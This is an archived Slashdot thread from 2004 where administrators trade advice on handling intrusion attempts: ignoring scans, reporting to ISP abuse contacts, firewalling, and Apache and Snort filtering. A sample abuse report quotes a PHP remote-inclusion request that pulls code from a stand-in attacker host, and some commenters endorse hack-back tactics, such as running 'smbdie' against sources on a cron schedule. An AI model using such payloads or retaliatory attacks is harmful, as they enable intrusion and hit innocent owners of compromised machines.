Forgot your password?
typodupeerror
Security

Dealing with Intruders? 656

Posted by Cliff
from the outside-assistance-for-security-issues dept.
drakyri asks: "I've been running a server for a small company for a few months. Recently, the number of attempted intrusions has jumped from about one every week to several per day - and these are only the really obvious attempts, like idiots who try to log in as root from the outside. The problem is that I'm not sure what to do about this. I've got their IP addresses and can usually tracert their ISP's - is there an accepted type of letter to send them without seeming like one of the corporate cease-and-desist gnomes?"
This discussion has been archived. No new comments can be posted.

Dealing with Intruders?

Comments Filter:
  • Easy (Score:5, Insightful)

    by Anonymous Coward on Friday August 13, 2004 @03:33AM (#9956402)
    ignore them.

    Unless they use a lot of bandwidth, that is the right decission to make.
    • Very Easy (Score:5, Insightful)

      by kunjan1029 (447713) <.ten.najnuk. .ta. .todhsals.liame.> on Friday August 13, 2004 @03:36AM (#9956421) Homepage
      intrusion attempt >> /dev/null

      ignore it. forget it. script kiddiz...

      • Re:Very Easy (Score:5, Insightful)

        by TeVi (128093) on Friday August 13, 2004 @04:15AM (#9956570) Homepage
        (mod parent up!)

        Yup, just make sure your box is secure.

        Intrusion attempts happen unfortunately, with all the viruses, worms, etc. Just make sure your box won't get caught.

        • by CheeseTroll (696413) on Friday August 13, 2004 @11:23AM (#9959125)
          Of course you should make your box as secure as possible. Ignoring automated attack attempts is probably the wisest course of action, as well, otherwise you waste a lot of time and only draw more more attention to your network, making it a bigger target.

          But for those intrusion attempts that appear to have a human being on the other end, a virtual smack upside the head would do the world some good. If it's some script kiddie, then let them know their feeble attempts do not go unnoticed, and are by no means appreciated, and chances are they'll find something more constructive to do before they get themselves into real trouble. If it's someone more hardcore, well, I guess it won't matter either way.
      • Re:Very Easy (Score:5, Insightful)

        by bstone (145356) on Friday August 13, 2004 @04:44AM (#9956647)
        Why not stop them before they get dangerous. Notify their ISP and get them a warning. Just "letting it go" will only encourage them to continue to keep on trying and learning until they figure out how to break in without being caught. A quick warning from their ISP might be just enough to scare them off, and word of mouth to their friends might help to keep others from thinking it's "cool" to attempt to break into computer systems.

        • Re:Very Easy (Score:5, Insightful)

          by Anonymous Coward on Friday August 13, 2004 @04:49AM (#9956668)
          Do as the good cops do: Arrest if there is enough evidence to lock them up, observe otherwise.

          Nothing encourages a script kiddy more than the feeling of invulnerability which you get from someone admitting that he knows what you're doing but can't do anything about it because you've not broken a law.
        • Re:Very Easy (Score:5, Informative)

          by BlackHawk-666 (560896) <ivan.hawkes@gmail.com> on Friday August 13, 2004 @05:24AM (#9956766) Homepage
          Don't bother, the real crackers are probably usings some lusers box to launch the attack from. You're just warning the person who didn't secure their box, and they're not likely to understand why you are telling them they are attacking your box.
          • Re:Very Easy (Score:5, Insightful)

            by jstave (734089) on Friday August 13, 2004 @08:52AM (#9957559)
            But isn't that, right there, a good reason to let them know? If it lets someone know that their security has been compromised, they can take action to close the hole.
            • Re:Very Easy (Score:5, Insightful)

              by jhoffoss (73895) on Friday August 13, 2004 @09:36AM (#9957907) Journal
              Unless you break into each zombie manually, dezombify them, and add a readme.txt to the user's desktop, they'll never find out.

              ISPs don't really roll this information back very often, because it just takes them too long, and there's too many.

              It'd be nice if more ISPs were more responsible with this, though. Something like vlan'd users get port scanned/vuln. scanned upon connection, and once passed, they're allowed onto the big bad net. Of course then everyone on /. would complain of privacy concerns...

              • Re:Very Easy (Score:4, Insightful)

                by mustangsal66 (580843) on Friday August 13, 2004 @11:30AM (#9959208)
                Do you have any idea how clueless the average broadband user is?

                Do you have any idea the cost involved in setting up the system you have described in equipment, admin time, programmer time, etc...?

                Who's responsible for fixing the vulnerabilities once found? Who's responsible if the vuln check actually harms the users computer or data? How do you prove it?

                The ISPs are not some large benevolent entity. They're init to make a profit. Sorry, yes, they like money. Numerous phone calls to techsupport deal with questions that start, It used to work when I had AOL. Yeah we all know AOL sucks, but apparently they make money. Cusomters don't want to hear, this isn't AOL, this is a real internet provider, they want to surf their p0rn, and chatrooms. If fixing a customer will loose the customer..they're not going to do it. It's bad business sense.

                Guess who gets the cost of fixing these customers, you do as the consumer.

                Now balance it. The ISP deals with a handful of customers (out of their total subscriber base), or increases costs to all... You try to explain to grandma why her internet bill increased by 10%.
                • Re:Very Easy (Score:4, Insightful)

                  by WNight (23683) on Friday August 13, 2004 @02:36PM (#9961452) Homepage
                  "They made it more secure - the rate increase pays for the guy who runs the security"

                  Doesn't seem too hard, but maybe my grandma is smarter than yours.

                  This kind of security is well worth it. ISPs that take a few basic precautions sit back and laugh as their competitors get ravaged by the worm of the week, while zombied windows boxes spam everyone and get the whole ISP blackholed, etc.

                  You pay one person to keep up on the script-kiddy tools and you block the ports they tend to use, or program your router to drop certain scanning packets, making it look like the computers you host are immune to the bug. Trivial stuff really.

                  If you want to get fancy you can try some sort of warning system that gives you an overview of what your users are doing. If you see that 1/3 of your users are loading a webpage at the same company you might be witnessing a DDoS attack, if one address is scanning your IP range you might want to start dropping their packets.

                  A little bit of forethought makes everything run much smoother, once you start taking precautions you'll find that despite the cost of the employee time you'll save money overall. Not in a way that short-sighted management (the type who don't understand backups and standby servers) will understand though, so you need to be at a clued company or be good at making proposals.
        • I agree! (Score:5, Interesting)

          by Mold (136317) on Friday August 13, 2004 @07:51AM (#9957211)
          Back when I was 13 or so, one of my friends had convinced me that trying something like this would be fun. I was a bit reluctant, but I had some knowledge of Unix and networking, and it did sound like fun.

          We never actually got into anything, but the next day I got an e-mail from one of the companies we had attempted to break into, politely asking me to stop. It scared the shit out of me and I never attempted anything like that again.

          And to be honest, the fact that I'd been caught and asked to stop (nicely!) impressed me far more than any of the hackers out there.
          • Re:I agree! (Score:4, Insightful)

            by liquidpele (663430) on Friday August 13, 2004 @09:26AM (#9957819) Journal
            I would have to agree with this completely.
            Ignoring them will make them feel like they could try more daring things, while sending something simple as described here can have much more positive responses, including respect for real computer experts instead of "hackers" called asidBurN@aol.com
          • Re:I agree! (Score:4, Interesting)

            by LaCosaNostradamus (630659) <LaCosaNostradamus@NOSpam.mail.com> on Friday August 13, 2004 @10:20AM (#9958375) Journal
            This essentially sums up my shoplifting experience as a young teen. I was warned that I was seen taking an item, and that I should go back and "find" it and return it. I went to the back of the store, pulled the gum out of my pocket, and returned it to the shelf. No police, no threats ... but a firm reminder that I was as "caught" as they wanted me to be. The scare factor worked, and I never shoplifted again. Kids are kids, and the entire thing seemed wisely handled.
    • Re:Easy (Score:5, Insightful)

      by Phil Karn (14620) <karn.ka9q@net> on Friday August 13, 2004 @04:27AM (#9956611) Homepage
      Agreed. Just ignore them.

      These things are far too common to get worked up about, and they still consume an infinitesmal fraction of my link capacity. I long ago stopped caring about unsuccessful intrusion attempts. I only care about the successful ones, and to help prevent those I apply all the usual safeguards.

    • This is more fun! (Score:5, Informative)

      by Ch_Omega (532549) on Friday August 13, 2004 @05:35AM (#9956805) Journal
      In my opinon, Tom Hudson's [geocities.com] way of dealing with these critters, is far more entertaining, than just ignoring them.
      • by Ch_Omega (532549) on Friday August 13, 2004 @07:41AM (#9957171) Journal
        Seems like me posting that link, has resulted in it exceeding its allowed bandwidth. Here's the Google Cache [216.239.59.104].
      • Re:This is more fun! (Score:5, Informative)

        by nahdude812 (88157) on Friday August 13, 2004 @07:58AM (#9957246) Homepage
        A lot of these exploits are typically ancient worms that someone has managed to not clean off their computer. If it's not an ancient worm, it's probably a zomibe in someone's hoarde.

        The problem with these two (most common) scenarios that the person who owns the computer isn't the real perpetrator, and the ability to track the perp down requires much more work than a simple whois lookup of the offending IP.

        Most attacks you see are going to be automated and launched on a wide scale. There are thousands and thousands of compromised Windows machines out on the net that are being used by people such as spammers and crackers for their dirty work.

        Lock your box down.
        Don't allow root to log in on SSH.
        Lock SSH and other sensitive services down to specific IP address blocks if you can. If you can't, investigate port knocking [portknocking.org] if you can do that. If you can't even go that far, investigate implementing a lockout policy for failed login attempts.

        Unless you see a single host being the source of a large pile of offensive behavior, chances are these are machines in a zombie hoarde. If it is limited to a single IP or a few IP's in a single C class, contact the ISP's abuse department *politely* (remember these are folks like you in jobs like yours, if you go in with guns blazing, they're less likely to help) and provide as much information as you can regarding the nature of the attack. Then firewall off the offending IPs.

        I used to aggressively track intrusion attempts and spam. I had a little PHP/MySQL tool I wrote where I could log these things, dumping in offending logs (or spam source), and it'd extract the culprit IP address, and once a day go through, looking up abuse addresses on whois and mailing a digest of the day's activities for that ISP to them.

        Ultimately I probably got about a 1% response rate from the ISP's (excluding auto-responses). After ~6 months of this, and about 40,000 records in my database, I started some statistical analysis. It turns out that there were no significant outliers for abusive activity from any given ISP (considering the size of that ISP's net blocks). Basically every intrusion attempt was some kind of zombie. There were probably a few by-hand attempts, but these are typically so low profile that there's no easy way to distinguish them from the hoardes.

        Some time later I was the recipient of a DDoS attack. Someone's zombie hoarde decided to repeatedly visit a page on my website that turns out to be a bit resource intensive to generate (my code is open source, so whoever devised this probably knew that). Every day, ~25,000 IP's each requested the same page every 4 minutes (+/- a few seconds I suppose for network latency). 375,000 hits an hour = 9,000,000 bogus hits a day. Day to day this number fluctuated, and the ISP's involved in the attack kept changing. It was obvious to me that whoever was driving the attack wasn't exposing the entire zombie hoarde to me at any given point because of how the ISP's involved kept shifting around. I figured he probably had a script set up to launch X number of zombies every day, and they probably had commands to execute for ~24 hours. The number was always pretty close to 25,000, never over, but usually more than 24,500.

        Ultimately the attack lasted about a month. I figured out a simple way to distinguish the zombie computers from legitimate users based on an error in the request headers, and I could just exit() at the top of my site for those who exhibited this error. I also logged the attempts I blocked, and was left with over 900,000 distinct IP addresses once the attack finally stopped.

        My point in all of that is that there *are* zombie hoardes out there, and it's the zombie hoardes that are most likely to compromise you. There's little you can do about it because getting a single IP from a hoarde firewalled off or cleaned up won't slow down your real attacker who was going to use a different zombie the next day anyhow.
      • Re:This is more fun! (Score:4, Interesting)

        by Tassach (137772) on Friday August 13, 2004 @09:59AM (#9958177)
        Why waste bandwidth and CPU time sending a page back to what's most likely a worm-infected machine? The default 404 response is more than adequate. His RedirectMatch hack is pretty good, but you can use the same regexps in SetEnvIf rules:
        #regexp rules to set environment variables
        SetEnvIf Request_URI "(regexp1)" ATTACK
        SetEnvIf Request_URI "(regexp2)" ATTACK
        ...

        # Anything that matches a worm/virus attack pattern goes in a special log
        CustomLog logs/attack_log common env=ATTACK

        # Everything that's not an attack goes on the normal log
        CustomLog logs/access_log common env=!ATTACK
        This puts all the zombie/worm attacks into a seperate log file. This also allows me to have logrotate truncate the attack_log and the access_log on different schedules.
        • Re:This is more fun! (Score:4, Interesting)

          by Tassach (137772) on Friday August 13, 2004 @10:04AM (#9958220)
          Opps... forgot the most important part:
          <Location />
          Order Allow,Deny
          Allow from all
          Deny from env=ATTACK
          ErrorDocument 403 "Worm Attack Suspected - Access Denied
          </Location>
          You could replace the errordocument with a PHP or CGI to send back a page of shame instead of static text, but why bother?
  • DMCA (Score:5, Funny)

    by Amiga Lover (708890) on Friday August 13, 2004 @03:33AM (#9956408)
    Use the DMCA to... I don't know, scare them or something. Mention RIAA and MPAA to their ISPs too.
  • by robogun (466062) on Friday August 13, 2004 @03:34AM (#9956411)
    I haven't seen any similar increase in activity. Does your firm have enemies? For instance, does your first name rhyme with Carl?
  • Abuse@ (Score:5, Informative)

    by craigske (106369) on Friday August 13, 2004 @03:35AM (#9956413) Homepage
    The accepted way is to send an email to abuse@ or to the abuse contact listed by ARIN for the netblock you are trying to lart.

    http://www.arin.net
    or lookup the RADB abuse contact
    http://www.dnsstuff.org
    • Be sure though to include *all* relevant log files too. I've sent a couple of mails in the past to ISPs and i think i got a response from about 50% of the ISPs contacted, from which only one responded once by saying they contacted the individual and took appropriate actions ... whatever that may mean.

      You'd be better off configuring your security better though.
  • Create a honeypot (Score:5, Insightful)

    by JVert (578547) <corganbillyNO@SPAMhotmail.com> on Friday August 13, 2004 @03:35AM (#9956415) Journal
    If you seem to be getting it from the same group of people make a honeypot but have some obvious hints once they get in, leave very little on the server and put the logs of their activity in an obvious place. Just be sure to isolate that machine from the rest of the network so if they do end up owning it they got no further then their failed attempt at your real machines.
    • Re:Create a honeypot (Score:5, Interesting)

      by welshwaterloo (740554) on Friday August 13, 2004 @04:16AM (#9956577)
      IMHO - If you're not completely sure your network is 101% secure, or you don't have several free hours a day it would be a bad idea to drop a honeypot anywhere near your network.

      Think about it - it's a slap in the face to the would-be hacker.. It's like you're leading him on, then saying "Ner Ner!" when he breaks into the pot.
      If your hacker is serious, he's gonna be really pissed about this.

      Secure your network & keep it secure - no need to stir 'em up.
      • Re:Create a honeypot (Score:3, Interesting)

        by ayjay29 (144994)
        I agrre with the above. Also creating a honeypot will give these guys something to play with, something fun to do, which will mean they will be more likely to come back.

        If they can't get anywhere, they will move on somewhere else...

  • by angryLNX (679691) on Friday August 13, 2004 @03:35AM (#9956417) Homepage
    Who'd have thought! [slashdot.org]
  • by Anonymous Coward on Friday August 13, 2004 @03:36AM (#9956418)
    on my University's network more than once. I ran Linux and I got into the habit of logging in as root, and sometimes I'd try to log in without thinking just after starting a telnet session. I didn't receive any notice from the U, but in this post-9/11 hellmouth, I'm sure I'd have been reported to the FBI as a potential terrorist.
  • Abuse (Score:5, Insightful)

    by martingunnarsson (590268) * <martin&snarl-up,com> on Friday August 13, 2004 @03:36AM (#9956419) Homepage
    When I had this problem I simply sent a mail to the ISP:s abuse-people. Most ISP has an e-mail address like abuse@theisp.com. Then they can send the guy a warning or whatever.
  • by Mal-2 (675116) on Friday August 13, 2004 @03:38AM (#9956428) Homepage Journal
    If you give them a more attractive target for a while, you may find there really aren't all that many attackers left to go after the systems that matter. Not only that, but it would be considerably easier to set up such a system to log their attack techniques, since it isn't actually doing anything. Finally, if they do break through, who cares? Just re-image the drive and let them start over. If they manage to repeat it, you now have a known weakness you can correct.

    Mal-2
  • My Advice (Score:3, Informative)

    by momogasuki (790667) on Friday August 13, 2004 @03:40AM (#9956435)
    Just ignore them. Focus on keeping your server software up to date and staying informed of possible security issues instead of waisting time trying to track down instrusion attempts.
  • Snort + Guardian (Score:4, Informative)

    by UltiSkeeter (663903) on Friday August 13, 2004 @03:40AM (#9956436)
    These two will detect most automatic attempts and then add the IP's to a drop list on your Linux firewall. www.snort.org. Guardian is listed under 'other tools'
    • Re:Snort + Guardian (Score:3, Interesting)

      by Umrick (151871)
      We ran this configuration for about 3 months. The problem is the shear number of false positives by the default snort rules. If you can't spend the time trimming down the ruleset to bare minimum to cover your needs, you will be locking out end users.

      Classic for us was one user who had multiple domains with us got blocked every time she went to view one of her pages. Turns out the snort rule was so generic it was just looking for /calendar, so anything containing that would get trashed.

      In the general se
  • by AngstAndGuitar (732149) on Friday August 13, 2004 @03:40AM (#9956439)
    You might consider sending a handwiten letter and use your own name, that would seem a bit more human. Also, most large companies will send polite-but-firm letters, so just threaten bodily harm to them and their pets, that should sound pretty un-corporate. I suppose only the first sugesstion is really a good one, but I like the second one more, so I'm not going to remove it from my comment.
  • Well... (Score:5, Informative)

    by MrWorf (216691) on Friday August 13, 2004 @03:42AM (#9956450) Homepage
    I always write a really "nice" letter to the ISP of the intruder, where I explain the problem, and that it is causing my customers trouble and that it eats up valuable bandwidth. I ask them to take action, and if not, that I'll have to proceed further (never been needed once). I send the email from the admin account, sign it with my name + admin at my system and then I attach the logs pertaining the intrusion attempt.

    So far, all of these "cease and desist" letters has resulted in action on the ISPs part, and in 50% of the cases, their admins write me back and give me feedback on the problem.

    Ofcourse, I don't do this for every attempt (all depending on my mood ... atleast nowadays), mostly for the more serious attempts (doing multiple attempts, different attempts, etc).

    The worst (or craziest?) attempt yet was by some nut who portscanned the system, port by port from start to finish. I actaully managed to get hold of the owner of the computer system that was scanning me and phoned him. Quite a hilarious experience. Needless to say, the portscanning stopped :)
    • Re:Well... (Score:4, Informative)

      by zoom (38906) on Friday August 13, 2004 @04:25AM (#9956605)
      I've had similar experiences. I've noticed several SSH attempts on my server recently - just a personal server at home. I've written to the abuse addresses found by running WHOIS and politely informed the ISP that there was an intrusion attempt and could they please inform the user that we are not a public service.
      Many times the ISP has responded and usually their customer has a zombie box.
      Always include a log if possible so they know the time and the IP-address. Remember to tell them what timezone the timestamps are from.
      WHOIS links
      http://ws.arin.net/cgi-bin/whois.pl
      http:/ /www.ripe.net/db/whois/whois.html
      http://www.apni c.net/apnic-bin/whois.pl
  • In my experience (Score:4, Informative)

    by Howzer (580315) * <grabshot@hotm[ ].com ['ail' in gap]> on Friday August 13, 2004 @03:43AM (#9956459) Homepage Journal
    In my admittedly limited experience, having been a "web manager" for half a dozen websites or so in my time, this sort of stuff was seasonal (highs in summer and winter when the script kiddies were indoors) and never used to particularly bother me.

    I had confidence in my setup, and no server I had control over was, to my knowledge, ever compromised.

    We never had any sensitive data outside the firewall, anyway.

    On two occasions it got serious (if an easily beaten DOS attack can be called serious) and even then it was only for 20 minutes or so. Our ISP (being a large telecom) was champing at the bit to go after people we had even a small scrap of evidence against, so on those two occasions we simply handed what information we'd gleaned to them, and they let out the dogs.

    At some stage, you've got to stop worrying and learn how to love the internet!

  • by arcade (16638) on Friday August 13, 2004 @03:46AM (#9956469) Homepage
    Personally I tend to ignore the scans for ssh and so forth, as they're just SYN-packets and doesn't consume too much of my resources. Call me a lazy/non-caring bastard. However, it would surely be nice to send off a message to the ISP, as the machines the scans are originating from are probably cracked too.

    I tend to report viruses. I grep my logs daily for viruses from various norwegian ISPs, to the mailserver I admin for my company. During the last five months I've sent daily virus reports to the largest ISP in norway, and they tend to reply within one business day - having notified their customer about the infection. If the customer gets several 'heads up' messages from the ISP without removing the virus, they get their port 25 access filtered until they've confirmed that they've removed the virus.

    I tend to send emails such as this.

    "
    Hi there.

    I've got several viruses from your customers today, and would appreciate it if you could notify your customers about the virus infections they probably have.

    Here are the relevant snippets from my logs:

    Virus: Netsky.B
    Received: from at

    Virus: Bagle.C
    Received: from at

    All timestamps on the server are NTP-sync'ed against .

    Thanks for your time
    "

    Recently I've also included a more personalized

    "Oh, and I have to commend your ISPs efficiency, as since march - you've managed to reduce the number of virus sending users to us from about per day, to this .. it's days since the last virus from you! Keep up the good work!"

    You could probably just adapt what I'm writing to something saying that a customer of theirs probably has been cracked, and that they are currently scanning for .. and so forth.

    If it's the actual cracker that's stupid enough to use his own computer, he'll get scared enough if they contact him telling him that his computers has been abused by others to scan people -- and will probably quit doing it. :)

    • by JWSmythe (446288) * <jwsmythe@jwsmyt h e . com> on Friday August 13, 2004 @05:02AM (#9956694) Homepage Journal

      Damn, you must have a lot of time on your hands..

      We actively block viruses at the mail server, and our logs show over 20k came towards us yesterday. Want to parse my logs and report the infected machines? :)

      And yes, we don't send the automagic "We received a virus" notices. Those are just plain annoying considering most headers are faked.

      • Damn, you must have a lot of time on your hands..

        Nah. We only get around 50 viruses per day, and I've made a list of the responsive ISPs. I tend to email the responsive ISP's one email per day, containing nothing but the relevant headers.

        The ISPs just receives an email with the name of the virus, and the Received: from header(s) they need to track down the person with that virus.

        Most is automatically generated by my scripts. I just paste it into my mail client and send it off with a few nice words on
    • More good advice ... (Score:3, Informative)

      by zonix (592337)

      This is really good advice, but you can do more. :-)

      Most ISPs really appreciate the complete header of the mail, and sometimes even the body in case of spam. First of all it adds to the authenticity, and second they'll be able to forward your complaint to the responsible ISPs if you had too much beer while reading a spoofed header (more so for spam than virus mails). Some ISPs are quite helpful in this regard.

      To aid in identifying the correct abuse addresses I can recommend the hinfo utility as a compleme

  • by Anonymous Coward on Friday August 13, 2004 @03:46AM (#9956472)
    Nothing beats the personal touch of hired goons...
  • by cbdavis (114685) on Friday August 13, 2004 @03:46AM (#9956473)
    or you'll spend half your time at work writing abuse letters. My logs at work show a constant barrage of windows attacks ( yes, code red is still there), 137 scans, numerous login hacks for any number of OS's, port scans that increment by 1 each time, etc. Sometimes it slows down. I am beginning to just consider it background noise. Just the cost of doing business on the web. As long as the probes arent massive or working, I just note and ignore. I only have so much time for this - it keeps me from downloading all that porn!
  • Ignore it? (Score:5, Informative)

    by Inominate (412637) on Friday August 13, 2004 @03:47AM (#9956475)
    This kind of stuff is all over the place. Odds are most of these are automated worms and similar crap. Unless it's really a concerted attack on your machines, as opposed to random scanning, it's not worth the effort to do anything about it except maybe firewall the IP.
  • by astrashe (7452) on Friday August 13, 2004 @03:47AM (#9956476) Journal
    I don't understand why you'd care how you come off to the people trying to crack into your system.

    They're out to do you harm. If one of them gets through and does some damage, you could lose your job.

  • by teamhasnoi (554944) <teamhasnoiNO@SPAMyahoo.com> on Friday August 13, 2004 @03:49AM (#9956485) Homepage Journal
    Just don't tell my mom! She'll take away my Compaq, or make me install SP2!
  • by dan dan the dna man (461768) on Friday August 13, 2004 @03:58AM (#9956511) Homepage Journal
    From a server in Brasil yesterday. I never bother reporting these things normally, but the compromised machine (ie originating the attack) was a webserver and had some "info@" addresses. I wrote, apologising for my lack of Portuguese, and an hour later had a very grateful email from the sysadmin. This is going to encourage me to report them in future.


    Basically I just gave a quick digest of the log clearly showing their IP and the attack in progress, and a note to the effect that I believed their machine had been compromised (in as plain English as I could muster) - and got the desired result.


    I like the fact that there's some script kiddie out there cursing that one of his "boxen" is no longer.. ;)

  • by Monkelectric (546685) <slashdot@@@monkelectric...com> on Friday August 13, 2004 @04:00AM (#9956521)
    True story: About 8 years some friends and I were getting o3ned DAILY by a hacker. One of these friends had a buddy in IBM's security division, who somehow got us a name and phone # of our hacker. We felt like asses when we found out we were getting beat down by a 15 years old. But we called his dad, explained what was going on, and that we knew where he lived. Problem SOLVED :)
  • by ComputerizedYoga (466024) on Friday August 13, 2004 @04:04AM (#9956532) Homepage
    mid july or so there were a bunch of random automated-looking and weak looking ssh login attempts all over the place ....

    threads on the full disclosure mailing list archives [netsys.com] and dslreports forums [dslreports.com] about that ....

    wonder if this is what the topic poster was encountering?
  • by BrynM (217883) * on Friday August 13, 2004 @04:13AM (#9956562) Homepage Journal
    Please note that this is innefectual to send to some ISPs. You won't always get a response. Look everything up first! Go look up who owns an IP at ARIN [arin.net] and who has registered domain names at a lot of different places [google.com]. Think hard before you send unless you write something automated - You may not want to send anything to someone who is actually the kiddie that attacked you. The result of that mistake is annoying. Trust me.

    Due to abuse, the following IP address(s) have been banned from accessing
    mydomain.com and it's associated services. The abuse is detailed as
    follows:

    IP(s) Banned: 216.nnn.225.nn

    Owner:
    OrgName: SOME ISP
    Address: 2 Hacker Home Street
    City: Isabel
    StateProv: CA
    PostalCode: 01120
    Country: US
    Admin Address: noc@someisp.net

    Reason:
    Malformed URL - Attempted PHP Exploit
    "216.nnn.225.nn - - [11/Aug/2004:10:03:03 -0700] "GET
    /themes/default/theme.php?THEME_DIR=http://w ww.evil-hacker.
    net/1.jpg?&cmd=uname%20-a;id; HTTP/1.0" 400 352"

    Severity: 5

    Remaining bans until entire address block banned: 3

    If you have any questions or need further explanation, please contact
    admin@mydomain.com.

    You
    Your Title
    Your Contact Info
  • Firewall? (Score:3, Interesting)

    by vandan (151516) on Friday August 13, 2004 @04:16AM (#9956574) Homepage
    Complaining to people won't get you anywhere, unless you go to the government and claim that you believe they are terrorists. That will get you some action.

    My advise is to firewall them.

    Personally I also try giving them a taste of their own medicine. You'd be surprised how many Windows machines are still vulnerable to the old 'smbdie'. I set up a cron job to 'smbdie' all hackers / spammers etc every 5 minutes. But of course this is horrible advise because ( and I'm sure everyone will respond and tell you that it's very naughty to fight fire with fire, and you will most likely go blind or some bullshit. )

    So yeah. Firewall them. And if you've got time, email their ISP and tell them that you've firewalled them and if you have any complaints from customers about them not being able to access your sever, that you will advise them that their ISP is harbouring hackers and that they should switch ISPs.
  • by Numen (244707) on Friday August 13, 2004 @04:18AM (#9956579)
    Whatever they're doing to you have a go back at them... chances are their system isn't as secure as yours.

    At the very least it's more fun than writting an e-mail!
  • by phek (791955) on Friday August 13, 2004 @04:22AM (#9956596)
    It's really normal to notice a huge increase in attacks this time of year. With the passing of defcon and black hat this month, a lot of new security vunerabilities have been released, and all of the 'script kiddies' are eager to try them out. The best thing to do is make sure all your software is up to date, and get familiar with the new vunerabilities that are out so you can protect yourself.

    As far as reporting them, you could try all day and not be able to report all of them, and even if you did, they're most likely attacking from someone else's vunerable machine. The only thing you can really do is watch out for anyone who's aggressivly attacking you (i.e. one person who's running lots of attacks on you trying desperately to break into your machine at any cost), and report those ones, or if you can find a way to contact that person, tell them to stop before you report them to their isp and/or authorities, this will usually scare most people off.

    Once you do start paying some decent attention to security releases, a lot of these stupid things people try won't surprise you, like the ssh root attempt is because some tool came out recently that just scans netblocks for anyone running ssh and try's logging in as two different users with no password, root being one of them. If your not familiar with where to find security releases, here's some good places to start:

    packetstorm security [packetstormsecurity.org]
    Security Focus [securityfocus.com]
  • by bretharder (771353) <bret@harder.gmail@com> on Friday August 13, 2004 @04:22AM (#9956597)
    Somewhat offtopic, but how do people deal with DOS attacks?
    I've had a person harrasing the forums at a website that I host.
    I banned by IP and then he started using proxys,
    so I had to write a script to ban his IP each time he logged in,
    of course then he started creating new accounts;
    so I had to change the forum registration to one account per unique email address.
    And then he tried to DOS the site by visiting the site and locking down his F5 key.
    (He accually confessed this to me in IRC; he had 4 other people do this with him.)
    I sent Comcast (his isp) the IRC logs & the network monitor logs.
    They sent me a generic response saying "blah blah blah.. this is an automated response".
    And thats it.
    So how do other /.ers deal with situations like this?
    It's a personal website, and I don't have the funds to hire a lawyer.
    I've banned his IP and ~6000 proxy IPs, but he still keeps getting through.
    • by Vo0k (760020) on Friday August 13, 2004 @04:57AM (#9956689) Journal
      Look up HTB on the net (Heuristic Token Bucket) - a firewall rule that limits network abuse while not obstructing normal network usage - every IP gets a pool of "tokens". One token is removed from the pool when a packet is sent, packets won't be sent as long as the pool is empty, but it gets refilled at constant, slow rate, until it's "full" again. So a user can download, say, 500K in one rapid burst at maximum network capacity, then his connection bandwidth goes down to some 5K. If he waits 100s he will be able to get 500K in similar burst again. This way, one page loads really fast. User reads the page, goes back, loads another one (minute later) very fast again. A loser who keeps reloading, exceeds his 500K bucket content in 2-3 reloads and then gets a constant drip of 5K upstream, hardly disturbing the others.
  • by hankwang (413283) * on Friday August 13, 2004 @04:49AM (#9956666) Homepage
    Let me tell you a true story.

    Back in January 1999 when everybody used telnet for remote logins, several computers in our department were root-compromised and had a rootkit installed (password sniffer, backdoors, and patched versions of ps, ls, and such to prevent being detected). We noticed some strange activities but had no clue what was going on, thinking that other people were trying to intrude us, while actually the cracker used our computers to intrude other people. It felt a bit like being in a thriller, where we step by step discovered what was going on, culminating in a session where we witnessed live how the cracker was logged in on one computer, from which he tried logging in on a second computer where we already had changed all passwords. We contacted the internet provider (he was behind an IP-masquerading firewall) and an university where he apparently illegally had plugged in a computer on the network and of course the cracker had been reading a number of emails before we finally locked down our systems.

    Since then, our computers got enormous attention from crackers, while suspicious messages appeared much more seldomly in other people's log files. This cracker was severely pissed off. We were compromised several times after that. Once, the presence of a rootkit revealed itself through the fact that an ls option wasn't working anymore. We repaired the situation and removed telnet/ftp from the computer (they had suspicious log file mesages), not knowing that it was the outdated sshd that caused the trouble. After the weekend, the owner of the computer came to me complaining that he couldn't log in. It turned out that the intruder wiped his whole home directory, which had no recent back-up! I can not believe that a cracker does something like that for any other reason than pure revenge.

    These incidents have taught me the value of staying up-to-date. What I wanted to tell here is: don't let the cracker know that it was you who caused them trouble or you might get repercussions. Oh, and note that I am not a professional system administrator; I was a PhD student who happened to know a bit more about Linux than most others.

  • by kinema (630983) on Friday August 13, 2004 @04:51AM (#9956672)
    I'm surprised nobody has suggested this before but I would recommend a tactical nuclear strike against the intruder. I've found that this simple step typically quells the attack.
  • by smoon (16873) on Friday August 13, 2004 @05:25AM (#9956770) Homepage
    Don't you use a firewall? You can't attempt to log in remotely if you're blocking the typical remote access ports -- SSH, telnet, etc.

    So you've got a machine sitting on the internet, home to a million and one active worms, and are surprised that it gets scanned constantly?

    Don't bother with the abuse reports -- more than likely it's just worm activity from computers whose clueless owners don't realize have been infected. A more recent one attempts SSH logins, which may be what you're seeing.

    It it was a _real_ crack attempt then you:
    1: Wouldn't know about it.
    2: Would be unable to pin it down. It would be bounced through several victim networks, so your ability to see where it's "coming from" is really just the last victim machine in the chain.

    Third possibility is script kiddies, in which case you would know about it and where they were coming from, but they would have no chance of success unless you are unwilling to keep up on patches and follow basic security practices like decent passwords.

    Best would be to close off remote-login ports altogether. If you need remote login then block for all but the address range you'd be coming from. If you need remote access from random locations, then at least consider using a heavily locked down system (e.g.: OpenBSD) or work _really hard_ to get your systems firewall/logging/etc. set up well.

    One OpenBSD/pf feature you might be interested in (also available from other systems) is the ability to tie Snort into the pf ruleset so that remote scanners, once detected, are ignored.
  • by KlausBreuer (105581) on Friday August 13, 2004 @08:57AM (#9957587) Homepage

    The online cartoons - once again - show us how the world works. Here you can find the difference between Hollywoods form of dealing with intruders, and The Real Worlds:

    Bigger Than Cheese [biggercheese.com]
  • Document Everything (Score:5, Informative)

    by catdevnull (531283) on Friday August 13, 2004 @09:36AM (#9957904)
    Data integrity is more important than catching them. Rememeber that first.

    1) Make notes about what you've found
    2) Report the the abuse as per the WHOIS info for the offenders
    3) Block their IPs at your border

    If you're using a firewall, great. If not--get one.
    If you haven't read Frisch's "Essential System Admnistration" read it:
    http://www.oreilly.com/catalog/esa3/index.html

    If you haven't read Stephen Northcutt's "Network Intrusion Detection" you should probably give it a good read as well:
    http://www.amazon.com/exec/obidos/tg/detail/-/0735 708681/104-7409931-6853536?v=glance

    There are some good articles all over the web regarding Linux security. A few google searches will help uncover them.

    Patch. It's not just for Windows.

    Limit services with ACLs and host restriction.

    Harden your system by partitioning read/write slices away from static mountpoints where your binaries are by mounting the read only ones as read only.

    chattr +i on your binaries--makes it tougher for skript kiddies.

    Talk to other admins--every day is a school day.

    AND

    Face the fact that you're not as smart as the crackers so you just have to create layers of security that keep you from being an easy target.
  • Post IPs! (Score:4, Informative)

